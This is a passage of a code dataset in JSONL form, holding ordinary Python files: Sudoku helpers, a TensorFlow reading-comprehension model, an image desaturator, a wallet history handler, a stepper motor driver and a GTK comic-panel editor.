+= 1\n zone = {}\n zone[\"type\"] = \"square\"\n zone[\"len\"] = nr_elements\n zone[\"coord\"] = tuple(square.values())\n insert_sorted(zone, zones)\n\n return zones\n\n\ndef insert_sorted(zone, zones):\n \"\"\"Take a dictionary describing a zone\n and inserted in the list of zones based\n on the len field\"\"\"\n if len(zones) == 0:\n zones.append(zone)\n else:\n inserted = False\n for i in range(0, len(zones)):\n if zone[\"len\"] > zones[i][\"len\"]:\n zones.insert(i, zone)\n inserted = True\n break\n else:\n continue\n if not inserted: # it was smaller than all of them\n zones.append(zone)\n\n\ndef insert_possibilities(puzzle, row, col):\n \"\"\"Eliminate possibilities for the position\n and insert if left with only one\"\"\"\n if puzzle[row][col] == 0:\n row_elements = get_zone_elements(\"row\", row, col, puzzle)\n col_elements = get_zone_elements(\"col\", row, col, puzzle)\n square_elements = get_zone_elements(\"square\", row, col, puzzle)\n numbers = [number for number in range(1, 10)]\n possibilities = [i for i in range(1, 10)]\n for possibility in numbers:\n if (possibility in row_elements) or (\n possibility in col_elements) or (\n possibility in square_elements):\n possibilities.remove(possibility)\n if len(possibilities) == 1:\n 
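The BA1E record above prunes k-mers with fewer than t occurrences in the whole text before scanning windows, which shrinks the search space but still re-counts each surviving pattern in every length-L window. An incremental sliding window yields the same (L, t)-clumps in a single pass; a sketch, assuming len(text) >= L:

from collections import defaultdict

def find_clumps(text, k, L, t):
    """Return k-mers occurring at least t times in some window of length L."""
    counts = defaultdict(int)
    for i in range(L - k + 1):            # counts for the first window
        counts[text[i:i + k]] += 1
    clumps = {p for p, c in counts.items() if c >= t}
    for start in range(1, len(text) - L + 1):
        counts[text[start - 1:start - 1 + k]] -= 1   # k-mer leaving on the left
        entering = text[start + L - k:start + L]     # k-mer entering on the right
        counts[entering] += 1
        if counts[entering] >= t:
            clumps.add(entering)
    return clumps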
puzzle[row][col] = possibilities[0]\n\n\ndef get_zone_elements(zone_type, coord1, coord2, board):\n \"\"\"Get all non-zero elements from a col, row or square\n zone_type (str): col / row / square\n coord1, coord2 (int): coordinates of the element we're at\n coord1 = row\n coord2 = col\"\"\"\n elements = []\n if zone_type == \"col\":\n for row in range(0, 9):\n if board[row][coord2] != 0:\n elements.append(board[row][coord2])\n elif zone_type == \"row\":\n for col in range(0, 9):\n if board[coord1][col] != 0:\n elements.append(board[coord1][col])\n else:\n square_coords = generate_square_coords()\n for square in square_coords:\n if (square[\"row_begin\"] <= coord1 <= square[\"row_end\"]) and (\n square[\"col_begin\"] <= coord2 <= square[\"col_end\"]):\n for row in range(square[\"row_begin\"], square[\"row_end\"] + 1):\n for col in range(square[\"col_begin\"],\n square[\"col_end\"] + 1):\n if board[row][col] != 0:\n elements.append(board[row][col])\n break\n\n return elements\n\n\ndef generate_square_coords():\n \"\"\"Build a tuple of disctionaries with square coords\"\"\"\n square_coordinates = []\n row_begin = 0\n row_end = 2\n col_begin = 0\n col_end = 2\n\n while len(square_coordinates) < 9:\n square_coordinates.append({\n \"row_begin\": row_begin,\n \"row_end\": row_end,\n \"col_begin\": col_begin,\n \"col_end\": col_end\n })\n if col_begin < 6 and col_end < 8:\n col_begin += 3\n col_end += 3\n else:\n col_begin = 0\n col_end = 2\n row_begin += 3\n row_end += 3\n\n return tuple(square_coordinates)\n\n\ndef print_board(board):\n \"\"\"Take the board and print it in a readable way in the console\"\"\"\n print(\"-\\t\" * 13)\n for row in range(0, len(board)):\n formatted_str = \"|\" + \"\\t\"\n for col in range(0, len(board[row])):\n if col in [3, 6]:\n formatted_str += \"|\\t\"\n formatted_str += str(board[row][col]) + \"\\t\"\n formatted_str += \"|\"\n print(formatted_str)\n if row in [2, 5]:\n print(\"-\\t\" * 13)\n print(\"-\\t\" * 13)","sub_path":"others_solvers/various_non_recursive/nr1/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"477066511","text":"myUniqueList = []\r\nmyLeftOvers = []\r\n\r\ndef leftovers(a):\r\n\tmyLeftOvers.append(a)\r\n\r\n\t\r\ndef addtolist(a):\r\n\tif(a not in myUniqueList):\r\n\t\tmyUniqueList.append(a)\r\n\t\treturn True\r\n\telse:\r\n\t\tleftovers(a)\r\n\t\treturn False\r\n\r\np = addtolist(2)\r\nq = addtolist(3)\r\nr = addtolist(4)\r\ns = addtolist(2)\r\nt = addtolist(6)\r\nw = addtolist(6)\r\n\r\n\r\nprint(myUniqueList)\r\nprint(myLeftOvers)","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"545086391","text":"\"\"\"\nGoal:\n - Takes in batches of (document, question, answer) tuples,\n runs bidirectional rnn, finds attention weights, and calculates loss\n\nArchitecture Overview:\n - Bidirectional LSTM/GRU on documents and questions (concatenate depth-wise)\n - Take last outputs of questions (from each direction) as query vector\n - Use bilinear weight to calculate similarity metric/attention weight for\n each word in the document using the query vector\n - Take weighted sum of word vectors and use that to make prediction\n\nIssues:\n - Better to pass mask itself instead of repeatedly creating masks with seq_lens?\n - Make softmax numerically stable\n - Gradient Clipping in 
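insert_possibilities() in the sudoku record above implements the "naked single" rule: collect every digit visible from the cell's row, column and 3x3 square, and fill the cell only when exactly one candidate remains. Set arithmetic states the same rule more directly; a sketch that reuses the record's get_zone_elements signature:

def naked_single(board, row, col, get_zone_elements):
    """Return the forced digit for an empty cell, or None if several remain."""
    if board[row][col] != 0:
        return None
    seen = set(get_zone_elements("row", row, col, board)) \
         | set(get_zone_elements("col", row, col, board)) \
         | set(get_zone_elements("square", row, col, board))
    candidates = set(range(1, 10)) - seen
    return candidates.pop() if len(candidates) == 1 else None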
GRU\n\nCredits: Attentive Reader model developed by https://arxiv.org/pdf/1506.03340.pdf\n and Stanford Reader model developed by https://arxiv.org/pdf/1606.02858v2.pdf\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nfrom rnn_cell import GRUCell\nfrom rnn import bidirectional_rnn, rnn\nfrom attention import BilinearFunction\n\nclass StanfordReader(object):\n \"\"\"\n Purpose:\n Instances of this class run the whole StanfordReader model.\n \"\"\"\n def __init__(self, max_entities, hidden_size=128, vocab_size=50000, embedding_dim=100, batch_size=32):\n self.max_entities = max_entities\n tf.set_random_seed(1234)\n\n # Placeholders\n # can add assert statements to ensure shared None dimensions are equal (batch_size)\n self.input_d = tf.placeholder(tf.int32, [None, None], name=\"input_d\")\n self.input_q = tf.placeholder(tf.int32, [None, None], name=\"input_q\")\n self.input_a = tf.placeholder(tf.int32, [None, ], name=\"input_a\")\n self.input_m = tf.placeholder(tf.int32, [None, ], name=\"input_m\")\n\n seq_lens_d = tf.reduce_sum(tf.cast(self.input_d >= 0, tf.int32), 1)\n seq_lens_q = tf.reduce_sum(tf.cast(self.input_q >= 0, tf.int32), 1)\n\n mask_d = tf.cast(tf.sequence_mask(seq_lens_d), tf.int32)\n mask_q = tf.cast(tf.sequence_mask(seq_lens_q), tf.int32)\n mask_m = tf.cast(tf.sequence_mask(self.input_m, maxlen=max_entities), dtype=tf.float32)\n\n # Document and Query embddings; One-hot-encoded answers\n masked_d = tf.mul(self.input_d, mask_d)\n masked_q = tf.mul(self.input_q, mask_q)\n one_hot_a = tf.one_hot(self.input_a, self.max_entities)\n\n # Buildling Graph (Network Layers)\n # ==================================================\n with tf.device('/cpu:0'), tf.variable_scope(\"embedding\"):\n W_embeddings = tf.get_variable(shape=[vocab_size, embedding_dim], \\\n initializer=tf.random_uniform_initializer(-0.01, 0.01),\\\n name=\"W_embeddings\")\n ################## Make option to use pre-trained embeddings ##################\n\n # Dimensions: batch x max_length x embedding_dim\n document_embedding = tf.gather(W_embeddings, masked_d)\n question_embedding = tf.gather(W_embeddings, masked_q)\n\n with tf.variable_scope(\"bidirection_rnn\"):\n\n mask_d = tf.cast(tf.sequence_mask(seq_lens_d), tf.float32)\n mask_q = tf.cast(tf.sequence_mask(seq_lens_q), tf.float32)\n\n # Bidirectional RNNs for Document and Question\n forward_cell_d = GRUCell(state_size=hidden_size, input_size=embedding_dim, scope=\"GRU-Forward-D\")\n backward_cell_d = GRUCell(state_size=hidden_size, input_size=embedding_dim, scope=\"GRU-Backward-D\")\n\n forward_cell_q = GRUCell(state_size=hidden_size, input_size=embedding_dim, scope=\"GRU-Forward-Q\")\n backward_cell_q = GRUCell(state_size=hidden_size, input_size=embedding_dim, scope=\"GRU-Backward-Q\")\n\n hidden_states_d, last_state_d = bidirectional_rnn(forward_cell_d, backward_cell_d, \\\n document_embedding, mask_d, concatenate=True)\n\n hidden_states_q, last_state_q = bidirectional_rnn(forward_cell_q, backward_cell_q, \\\n question_embedding, mask_q, concatenate=True)\n\n with tf.variable_scope(\"attention\"):\n # Attention Layer\n attention = BilinearFunction(attending_size=hidden_size*2, attended_size=hidden_size*2)\n self.alpha_weights, self.attend_result = attention(attending=last_state_q, attended=hidden_states_d, \\\n time_mask=mask_d)\n\n with tf.variable_scope(\"prediction\"):\n W_predict = tf.get_variable(name=\"predict_weight\", shape=[hidden_size*2, self.max_entities], \\\n initializer=tf.random_normal_initializer(mean=0.0, stddev=0.1))\n b_predict = 
tf.get_variable(name=\"predict_bias\", shape=[self.max_entities],\n initializer=tf.constant_initializer(0.0))\n # Dimensions (batch_size x max_entities)\n predict_probs = (tf.matmul(self.attend_result, W_predict) + b_predict) * mask_m\n\n # Custom Softmax b/c need to use time_mask --------------------\n # Also numerical stability:\n\n # e_x = exp(x - x.max(axis=1))\n # out = e_x / e_x.sum(axis=1)\n numerator = tf.exp(tf.sub(predict_probs, tf.expand_dims(tf.reduce_max(predict_probs, 1), -1))) * mask_m\n denom = tf.reduce_sum(numerator, 1)\n\n # Transpose so broadcasting scalar division works properly\n # Dimensions (batch x max_entities)\n predict_probs_normalized = tf.div(numerator, tf.expand_dims(denom, 1))\n likelihoods = tf.reduce_sum(tf.mul(predict_probs_normalized, one_hot_a), 1)\n log_likelihoods = tf.log(likelihoods+0.00000000000000000001)\n\n # Negative log-likelihood loss\n self.loss = tf.mul(tf.reduce_sum(log_likelihoods), -1)/tf.cast(tf.shape(self.input_d)[0], tf.float32)\n correct_vector = tf.cast(tf.equal(tf.argmax(one_hot_a, 1), tf.argmax(predict_probs_normalized, 1)), \\\n tf.float32, name=\"correct_vector\")\n self.accuracy = tf.reduce_mean(correct_vector)\n\n\n def get_mask_shape(self):\n print (self.mask_d.get_shape(), self.mask_q.get_shape())\n","sub_path":"reading_comprehension/StanfordReader1.py","file_name":"StanfordReader1.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"52554064","text":"from PIL import Image\nimport sys, argparse\n\n# Show a progression bar:\ndef percentbar(percent, size=10):\n print(\"\\r[{0:<{size}}] {1:.0%}\".format('#'*int(percent*size), percent, size=size)),\n sys.stdout.flush()\n\n# Desaturate:\ndef desaturate(input, output, progress):\n \n #Read input:\n try:\n myimage = Image.open(input)\n pixels = myimage.load()\n except:\n print(\"Error loading image!\")\n \n #Get some metadata\n sizeX, sizeY = myimage.size\n mode = myimage.mode\n \n if mode == \"RGB\": \n for i in range(sizeX):\n for j in range(sizeY): \n \n #Weighted desaturation:\n value = int(pixels[i,j][0] * 0.3 + pixels[i,j][1] * 0.59 + pixels[i,j][2] * 0.11)\n pixels[i,j] = (value, value, value)\n \n #Show progress if demanded: \n if progress:\n percentbar(i / float(sizeX-1), 20)\n \n elif mode == \"RGBA\":\n for i in range(sizeX):\n for j in range(sizeY): \n \n #Weighted desaturation:\n value = int(pixels[i,j][0] * 0.3 + pixels[i,j][1] * 0.59 + pixels[i,j][2] * 0.11)\n pixels[i,j] = (value, value, value, pixels[i,j][3])\n \n #no desaturation needed for modes \"1\", \"L\"\n \n print(\"Saving...\")\n \n #Save to output:\n myimage.save(output)\n \n#Main: \nif __name__ == \"__main__\":\n \n#Get address from command line:\n\n parser = argparse.ArgumentParser(description='Desaturates a PNG.')\n parser.add_argument('--input','-i',help='specifies the input-file path')\n parser.add_argument('--output','-o',help='specifies the input-file path')\n parser.add_argument('--noprogress', '-np', help='don\\'t show a progressbar, might help with performance', action=\"store_true\")\n args = parser.parse_args()\n \n #Get input and output, parse it for desaturation:\n if args.input is not None and args.output is not None:\n if args.noprogress:\n desaturate(args.input, args.output, False)\n else:\n desaturate(args.input, args.output, True)\n elif args.input == \"None\":\n print(\"Please specify an input-file.\")\n else:\n print(\"Please specify an output-file.\")\n 
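The StanfordReader record rolls its own softmax because positions beyond input_m must end with exactly zero probability, and because subtracting the row maximum keeps tf.exp from overflowing. The same arithmetic rendered in NumPy, assuming mask holds 0/1 floats:

import numpy as np

def masked_softmax(logits, mask):
    shifted = logits - logits.max(axis=1, keepdims=True)  # numerical stability
    numer = np.exp(shifted) * mask                        # zero out masked slots
    return numer / numer.sum(axis=1, keepdims=True)

probs = masked_softmax(np.array([[2.0, 1.0, -1.0]]), np.array([[1.0, 1.0, 0.0]]))
print(probs)   # third entry is exactly 0; the first two sum to 1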
\n","sub_path":"pngdesaturate.py","file_name":"pngdesaturate.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"560945267","text":"set1 = {11,12,13}\nset2 = {87,56,78}\ncounter =0\nlength= len(set1)\n#print(length)\ni=j=0\n\nfor i in set1:\n for j in set2:\n if i==j:\n counter += 1\n #print(counter)\nif counter == length:\n print(\"True! Subset\")\nelse:\n print(\"False! Not Subset\")","sub_path":"submissions/sp_047_suneet/Week 12/Day 4/session_2/check_subset.py","file_name":"check_subset.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"333492399","text":"#!/usr/bin/env python3\nimport struct\nfrom sys import stdin, stdout\n\nfor l in stdin:\n\tif l[0] == '#':\n\t\tcontinue\n\n\tcoords = list(map(float, l.split()[1:4]))\n\tbinary = struct.pack('fff', *coords)\n\tstdout.buffer.write(binary)\n","sub_path":"pointclouds/colmap_to_bin.py","file_name":"colmap_to_bin.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"432619112","text":"# -*- coding: utf-8 -*-\n#\n# Project name: NynjaWalletPy\n# File name: history\n# Created: 2018-07-12\n#\n# Author: Liubov M. <liubov.mikhailova@gmail.com>\n\nimport logging\nfrom base import BaseHandler\nfrom helpers.http_helper import get_request\nfrom static_vars.global_string import MISSED_REQUIRED_PARAMS\nfrom static_vars.global_variables import GET_ACC_TRANSFER_HISTORY\n\nlogger = logging.getLogger(__name__)\n\n\nclass WalletHistoryHandler(BaseHandler):\n allowed_methods = ('GET', )\n\n def get(self):\n \"\"\"\n Get transfer history\n \"\"\"\n logger.info(\"WalletHistory/Get: {0}\".format(self.request.arguments))\n\n required_param_names = ['address']\n required_params = self.get_request_params(required_param_names, query_param=True)\n\n # check for missing params\n missed_param_names = self.missing_required_params(required_param_names, required_params)\n if missed_param_names:\n return self.failure(message=MISSED_REQUIRED_PARAMS.format(', '.join(missed_param_names)))\n\n get_history_response = get_request(GET_ACC_TRANSFER_HISTORY.format(required_params['address']))\n if get_history_response['message'] == \"NOTOK\":\n return self.failure(message=get_history_response['result'])\n\n history = []\n if get_history_response['result']:\n for r in get_history_response['result']:\n history.append({\n 'address_from': r['from'],\n 'address_to': r['to'],\n 'timestamp': r['timeStamp'],\n 'amount': r['value']\n })\n\n response = {\n 'history': history\n }\n\n return self.success(response)","sub_path":"api/handlers/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"4324597","text":"#!/usr/bin/env python\n\"\"\"\n28BYJ_48.py\n2020-11-22\nPublic Domain\n\nhttp://abyz.me.uk/lg/py_lgpio.html\n\n./28BYJ_48.py [chip] gpio1 gpio2 gpio3 gpio4\n\nE.g.\n\n./28BYJ_48.py 20 21 22 23 # gpiochip=0 gpio1=20 gpio2=21 gpio3=22 gpio4=23\n\n./28BYJ_48.py 2 7 5 11 3 # gpiochip=2 gpio1=7 gpio2=5 gpio3=11 gpio4=3\n\"\"\"\n\nclass stepper:\n \"\"\"\n A class to pulse a stepper.\n \"\"\"\n\n on = [7, 3, 11, 9, 13, 12, 14, 6]\n\n def __init__(self, sbc, chip, GPIO):\n \"\"\"\n \"\"\"\n self._sbc = sbc\n self._chip = chip\n self._leader = GPIO[0]\n self._pos = 0\n\n 
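The per-pixel loop in the pngdesaturate.py record applies the classic ITU-R BT.601 luma weights (0.3, 0.59, 0.11, rounded from 0.299/0.587/0.114). Pillow's mode conversion performs the identical transform in C and skips the Python-level double loop; a sketch that, unlike the record, assumes plain RGB input and does not preserve an alpha channel:

from PIL import Image

def desaturate_fast(input_path, output_path):
    img = Image.open(input_path)
    gray = img.convert("L")                # L = 0.299 R + 0.587 G + 0.114 B
    gray.convert("RGB").save(output_path)  # three identical channels, as in the loop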
sbc.group_claim_output(chip, GPIO)\n\n def move(self):\n\n if self._pos < 0:\n self._pos = 7\n elif self._pos > 7:\n self._pos = 0\n\n self._sbc.group_write(self._chip, self._leader, stepper.on[self._pos])\n\n def forward(self):\n self._pos += 1\n self.move()\n\n def backward(self):\n self._pos -= 1\n self.move()\n\n def stop(self):\n self._sbc.group_free(self._chip, self._leader)\n\nif __name__ == \"__main__\":\n\n import time\n import sys\n import lgpio as sbc\n\n if len(sys.argv) == 6: # chip gpio1 gpio2 gpio3 gpio4\n chip = int(sys.argv[1])\n gpio1 = int(sys.argv[2])\n gpio2 = int(sys.argv[3])\n gpio3 = int(sys.argv[4])\n gpio4 = int(sys.argv[5])\n\n elif len(sys.argv) == 5: # gpio1 gpio2 gpio3 gpio4 (chip 0)\n chip = 0\n gpio1 = int(sys.argv[1])\n gpio2 = int(sys.argv[2])\n gpio3 = int(sys.argv[3])\n gpio4 = int(sys.argv[4])\n\n else:\n print(\"Usage: ./28BYJ_48.py [chip] gpio1 gpio2 gpio3 gpio4\")\n exit()\n\n chip = sbc.gpiochip_open(0)\n\n s = stepper(sbc, chip, [gpio1, gpio2, gpio3, gpio4])\n\n for i in range(4096):\n time.sleep(0.0015)\n s.forward()\n\n for i in range(4096):\n time.sleep(0.0015)\n s.backward()\n\n s.stop()\n\n sbc.gpiochip_close(chip)\n\n","sub_path":"EXAMPLES/py_lgpio/28BYJ_48.py","file_name":"28BYJ_48.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"516595426","text":"import cairo\nfrom gettext import gettext as _\n\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GObject\nfrom gi.repository import GdkPixbuf\n\nfrom sugar3.graphics import style\nfrom sugar3.graphics.toolbutton import ToolButton\n\nHANDLE_SIZE = 18\nMIN_IMAGE_SIZE = 50\n\n\nclass BaseWindow(Gtk.Window):\n\n def __init__(self, width=-1, height=-1):\n GObject.GObject.__init__(self)\n self.set_border_width(style.LINE_WIDTH)\n self.set_position(Gtk.WindowPosition.CENTER_ALWAYS)\n self.set_decorated(False)\n self.set_resizable(False)\n if width == -1:\n width = Gdk.Screen.width() - style.GRID_CELL_SIZE * 2\n if height == -1:\n height = Gdk.Screen.height() - style.GRID_CELL_SIZE * 2\n self.set_size_request(width, height)\n\n\nclass BasicToolbar(Gtk.Toolbar):\n\n def __init__(self, icon_name, title=''):\n GObject.GObject.__init__(self)\n\n icon = ToolButton(icon_name)\n self.insert(icon, -1)\n\n label = Gtk.Label()\n label.set_markup('<b>%s</b>' % title)\n label.set_alignment(0, 0.5)\n tool_item = Gtk.ToolItem()\n tool_item.set_expand(True)\n tool_item.add(label)\n tool_item.show_all()\n self.insert(tool_item, -1)\n\n self.separator = Gtk.SeparatorToolItem()\n self.separator.props.draw = False\n self.separator.set_expand(True)\n self.insert(self.separator, -1)\n\n self.stop = ToolButton(icon_name='dialog-cancel')\n self.stop.set_tooltip(_('Cancel'))\n self.insert(self.stop, -1)\n self.stop.show()\n\n self.confirm = ToolButton(icon_name='dialog-ok')\n self.confirm.set_tooltip(_('Done'))\n self.insert(self.confirm, -1)\n self.confirm.show()\n\n\nclass ReorderView(BaseWindow):\n\n def __init__(self, activity):\n BaseWindow.__init__(self)\n self.toolbar = BasicToolbar('thumbs-view')\n\n self.toolbar.stop.connect('clicked', self.__stop_clicked_cb)\n self.toolbar.confirm.connect('clicked', self.__ok_clicked_cb)\n\n self.scrollwin = ReorderObjects(activity)\n title = _('Drag the images to reorder')\n label = Gtk.Label('')\n label.set_markup('<span size=\"x-large\">%s</span>' % title)\n self.vbox = Gtk.VBox()\n self.vbox.pack_start(self.toolbar, False, False, 0)\n 
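The `on` table in the 28BYJ_48.py record encodes the half-step drive sequence as integers handed to group_write, one bit per claimed GPIO/coil. Decoding it shows consecutive entries differ in exactly one bit, the defining property of a half-step sequence (here with one or two coils low at a time, apparently an inverted-polarity drive):

on = [7, 3, 11, 9, 13, 12, 14, 6]
for step, value in enumerate(on):
    print(step, format(value, "04b"))   # one bit per winding

# each step toggles a single coil
assert all(bin(on[i] ^ on[(i + 1) % 8]).count("1") == 1 for i in range(8))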
self.vbox.pack_start(label, False, False, style.DEFAULT_SPACING)\n self.vbox.pack_start(self.scrollwin, True, True, 0)\n self.add(self.vbox)\n self.scrollwin.show()\n self.modify_bg(Gtk.StateType.NORMAL,\n style.COLOR_WHITE.get_gdk_color())\n\n def __stop_clicked_cb(self, button):\n self.destroy()\n\n def __ok_clicked_cb(self, button):\n self.scrollwin.reorder_comicboxs()\n self.scrollwin.display_comicboxs()\n self.destroy()\n\n\nclass ReorderObjects(Gtk.ScrolledWindow):\n def __init__(self, activity):\n GObject.GObject.__init__(self)\n self.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.ALWAYS)\n self.activity = activity\n self.comicboxes = self.activity.page.boxs\n\n self.liststore = Gtk.ListStore(GdkPixbuf.Pixbuf)\n self.iconview = Gtk.IconView.new()\n self.iconview.set_property('item-width', 200)\n self.iconview.set_model(self.liststore)\n self.iconview.set_pixbuf_column(0)\n self.iconview.set_reorderable(True)\n\n for comicbox in self.comicboxes[1:]:\n self.liststore.append([comicbox.get_thumbnail()])\n\n self.add(self.iconview)\n\n def on_item_activated(self):\n model = self.iconview.get_model()\n pixbuf = model[self.iconview.get_selected_items()[0]][0]\n for comicbox in self.comicboxes[1:]:\n if pixbuf is comicbox.thumbnail:\n self.editor = ImageEditorView(comicbox)\n self.editor.show_all()\n break\n\n def reorder_comicboxs(self):\n sorted_list = []\n for row in self.liststore:\n for comicbox in self.comicboxes[1:]:\n if row[0] is comicbox.thumbnail:\n self.activity.page.table.remove(comicbox)\n sorted_list.append(comicbox)\n break\n sorted_list.insert(0, self.comicboxes[0])\n self.comicboxes = sorted_list\n self.activity.page.boxs = self.comicboxes\n\n def display_comicboxs(self):\n for i in range(0, len(self.comicboxes[1:])):\n reng = int(i / 2)\n column = i - (reng * 2)\n self.activity.page.table.attach(\n self.comicboxes[i + 1], column, column + 1, reng, reng + 1)\n\n\nclass ImageElement:\n def __init__(self, pixbuf, box, x, y, w, h):\n self.box = box\n self.pixbuf = pixbuf\n self.pixbuf_original = self.pixbuf.scale_simple(\n self.pixbuf.get_width(), self.pixbuf.get_height(),\n GdkPixbuf.InterpType.BILINEAR)\n self.x = x\n self.y = y\n self.width = w\n self.height = h\n self.calculate_boundaries()\n self.calculate_points()\n self.margin_x = 0\n self.margin_y = 0\n self.box_width = 0\n self.box_height = 0\n\n def reset(self):\n self.x = 0\n self.y = 0\n self.width = self.box_width\n self.height = self.box_height\n self.calculate_boundaries()\n self.calculate_points()\n\n def calculate_boundaries(self):\n self.boundaries = {}\n self.boundaries['min_x'] = self.x\n self.boundaries['max_x'] = self.x + self.width\n self.boundaries['min_y'] = self.y\n self.boundaries['max_y'] = self.y + self.height\n\n def calculate_points(self):\n self.points = {}\n self.points[\"upper_left\"] = [self.x, self.y]\n self.points[\"upper_right\"] = [self.x + self.width - HANDLE_SIZE,\n self.y]\n self.points[\"lower_left\"] = [self.x,\n self.y + self.height - HANDLE_SIZE]\n self.points[\"lower_right\"] = [self.x + self.width - HANDLE_SIZE,\n self.y + self.height - HANDLE_SIZE]\n\n def is_selected(self, x, y):\n # substract the margin values\n x = x - self.margin_x\n y = y - self.margin_y\n\n if (x >= self.boundaries['min_x'] and\n x <= self.boundaries['max_x']) and \\\n (y >= self.boundaries['min_y'] and\n y <= self.boundaries['max_y']):\n return True\n else:\n return False\n\n def is_resize(self, x, y):\n if self.is_in_point(x, y):\n return True\n else:\n return False\n\n def is_in_point(self, x, y, 
point=None):\n if point is not None:\n # substract the margin values\n x = x - self.margin_x\n y = y - self.margin_y\n\n if (x >= point[0] and x <= (point[0] + HANDLE_SIZE)) \\\n and (y >= point[1] and y <= (point[1] + HANDLE_SIZE)):\n return True\n else:\n return False\n else:\n if self.is_in_point(x, y, self.points[\"upper_left\"]) or \\\n self.is_in_point(x, y, self.points[\"upper_right\"]) or \\\n self.is_in_point(x, y, self.points[\"lower_left\"]) or \\\n self.is_in_point(x, y, self.points[\"lower_right\"]):\n return True\n else:\n return False\n\n def draw(self, ctx):\n self.image = ctx.get_target().create_similar(\n cairo.CONTENT_COLOR_ALPHA, self.box.width,\n self.box.height)\n pixb_scaled = self.pixbuf_original.scale_simple(\n self.width, self.height, GdkPixbuf.InterpType.BILINEAR)\n ct = cairo.Context(self.image)\n Gdk.cairo_set_source_pixbuf(ct, pixb_scaled, self.x, self.y)\n ct.paint()\n self.pixbuf = pixb_scaled\n\n ctx.save()\n ctx.translate(self.margin_x, self.margin_y)\n ctx.rectangle(0, 0, self.box.width, self.box.height)\n ctx.clip()\n ctx.set_source_surface(self.image, 0, 0)\n ctx.paint()\n ctx.restore()\n\n # draw the box border\n ctx.save()\n ctx.rectangle(self.margin_x, self.margin_y, self.box_width,\n self.box_height)\n ctx.set_source_rgb(0, 0, 0)\n ctx.stroke()\n ctx.restore()\n\n # draw the image border\n ctx.save()\n ctx.translate(self.margin_x, self.margin_y)\n ctx.set_line_width(2)\n ctx.set_source_rgb(1, 1, 1)\n ctx.rectangle(self.x, self.y, self.width, self.height)\n ctx.stroke_preserve()\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_dash([2])\n ctx.stroke()\n ctx.restore()\n\n # draw hadles\n self._draw_handle(ctx, self.x, self.y)\n self._draw_handle(ctx, self.x + self.width - HANDLE_SIZE, self.y)\n self._draw_handle(ctx, self.x, self.y + self.height - HANDLE_SIZE)\n self._draw_handle(ctx, self.x + self.width - HANDLE_SIZE,\n self.y + self.height - HANDLE_SIZE)\n\n def _draw_handle(self, ctx, x, y):\n ctx.save()\n ctx.translate(self.margin_x, self.margin_y)\n ctx.set_line_width(2)\n ctx.set_source_rgb(1, 1, 1)\n ctx.rectangle(x, y, HANDLE_SIZE, HANDLE_SIZE)\n ctx.stroke_preserve()\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_dash([2])\n ctx.stroke()\n ctx.restore()\n\n def move(self, x_movement, y_movement, allocation):\n self.x = self.x + x_movement\n self.y = self.y + y_movement\n if self.x + self.width > allocation.width:\n self.x -= (self.x + self.width) - (allocation.width)\n\n if self.y + self.height > allocation.height:\n self.y -= (self.y + self.height) - (allocation.height)\n\n self.calculate_boundaries()\n self.calculate_points()\n\n def resize(self, x_movement, y_movement, allocation, start_x, start_y):\n\n if self.is_in_point(start_x, start_y, self.points[\"lower_left\"]):\n self.x += x_movement\n self.width -= x_movement\n self.height += y_movement\n elif self.is_in_point(start_x, start_y, self.points[\"upper_right\"]):\n self.y += y_movement\n self.height -= y_movement\n self.width += x_movement\n elif self.is_in_point(start_x, start_y, self.points[\"upper_left\"]):\n self.y += y_movement\n self.x += x_movement\n self.width -= x_movement\n self.height -= y_movement\n else:\n self.height += y_movement\n self.width += x_movement\n\n if self.width < MIN_IMAGE_SIZE:\n self.width = MIN_IMAGE_SIZE\n if self.height < MIN_IMAGE_SIZE:\n self.height = MIN_IMAGE_SIZE\n\n if self.x + self.width > allocation.width:\n self.width -= (self.x + self.width) - (allocation.width)\n\n if self.y + self.height > allocation.height:\n self.height -= (self.y + self.height) - 
(allocation.height)\n\n self.calculate_boundaries()\n self.calculate_points()\n\n\nclass CanvasEditor(Gtk.EventBox):\n def __init__(self, comicbox, width, height, window):\n Gtk.EventBox.__init__(self)\n\n self.width = width\n self.height = height\n self.is_resize = False\n self.is_move = False\n self.parentw = window\n\n self.modify_bg(Gtk.StateType.NORMAL,\n style.COLOR_WHITE.get_gdk_color())\n self._drawingarea = Gtk.DrawingArea()\n self.add(self._drawingarea)\n\n self._drawingarea.add_events(\n Gdk.EventMask.POINTER_MOTION_MASK |\n Gdk.EventMask.BUTTON_PRESS_MASK |\n Gdk.EventMask.BUTTON_RELEASE_MASK |\n Gdk.EventMask.BUTTON_MOTION_MASK)\n\n self.image = ImageElement(\n comicbox.pixbuf, self,\n comicbox.img_x, comicbox.img_y,\n comicbox.img_w, comicbox.img_h)\n\n self._drawingarea.connect(\"draw\", self.draw_cb)\n self.connect(\"button_press_event\", self.pressing)\n self.connect(\"motion_notify_event\", self.mouse_move)\n self.connect(\"motion_notify_event\", self.moving)\n self.connect(\"button_release_event\", self.releassing)\n self.redraw()\n\n def size_allocate(widget, allocation):\n self._drawingarea.set_size_request(allocation.width,\n allocation.height)\n self.image.margin_x = (allocation.width - self.width) // 2\n self.image.margin_y = (allocation.height - 